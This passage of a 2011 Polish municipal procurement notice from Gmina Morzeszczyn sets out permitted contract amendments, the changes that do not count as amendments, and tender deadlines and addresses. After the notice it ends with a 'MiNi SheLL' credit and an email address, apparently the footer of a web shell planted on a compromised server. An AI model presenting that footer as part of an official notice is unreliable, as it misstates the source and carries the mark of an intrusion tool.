b)	zmiana podwykonawcy , przy pomocy którego Wykonawca wykonuje przedmiot umowy na innego dysponującego co najmniej porównywalnym doświadczeniem , potencjałem technicznym i osobowym
c)	rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie wykonawcy, o ile posłużenie się podwykonawcą doprowadzi do skrócenia terminu wykonania przedmiotu umowy, zmniejszenia należnego Wykonawcy wynagrodzenia lub zastosowania przy wykonaniu przedmiotu umowy bardziej zaawansowanych rozwiązań technologicznych w porównaniu do wskazanych w SIWZ.

   Pozostałe zmiany  : 
      
       1.  Pozostałe zmiany  postanowień umowy w szczególności  :
         a)  siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie ze SIWZ
         b)  zmiana obowiązującej stawki VAT. Jeżeli zmiana stawki VAT będzie powodować zwiększenie  
              kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość  
              zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego
              przez Wykonawcę 
c)  zmiana sposobu rozliczenia umowy lub dokonywania płatności na rzecz Wykonawcy na skutek  
     zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych     
     dotyczących realizacji projektu 
d)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące Wykonawcy  zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami
e)	zmiany uzasadnione okolicznościami o których mowa w art. 357.1 Kc z uwzględnieniem faktu, że za rażącą  zostanie uznana strata w wysokości, której mowa w art. 397 Ksh

Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią one jednocześnie zobowiązania do wyrażenia takiej zgody.

Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych  :
a)	skorzystanie z klauzul waloryzacyjnych przewidzianych w umowie na warunkach w niej określonych


b)	zmiana danych związanych z obsługą administracyjno - organizacyjną Umowy ( zmiana numeru rachunku bankowego, zmiana dokumentów potwierdzających uregulowanie płatności wobec podwykonawców)
c)	zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami
d)	udzielenie zamówień dodatkowych określonych w przepisach o zamówieniach publicznych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.morzeszczyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Morzeszczyn
ul. 22 Lipca 4
83-132 Morzeszczyn
pok. Nr 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2011 godzina 13:00, miejsce: Urząd Gminy Morzeszczyn
ul. 22 Lipca 4
83-132 Morzeszczyn
Sekretariat  pok. Nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com